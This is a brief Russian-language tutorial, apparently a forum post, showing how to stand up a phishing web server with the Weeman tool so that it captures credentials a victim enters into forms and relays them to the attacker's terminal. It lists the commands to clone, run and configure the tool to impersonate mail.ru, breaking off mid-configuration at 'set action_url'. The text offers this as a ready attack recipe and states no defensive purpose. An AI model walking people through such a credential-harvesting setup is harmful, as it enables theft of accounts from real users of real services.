Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
>
git clone github.com/Hypsurus/weeman
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
>
cd weeman/
>
ls –a
>
chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции
)
>
show (посмотрим текущие настройки)
Используем
weeman на примере mail.ru.
>
set url hppts://mail.ru
>
set port 8080
>
set action_url...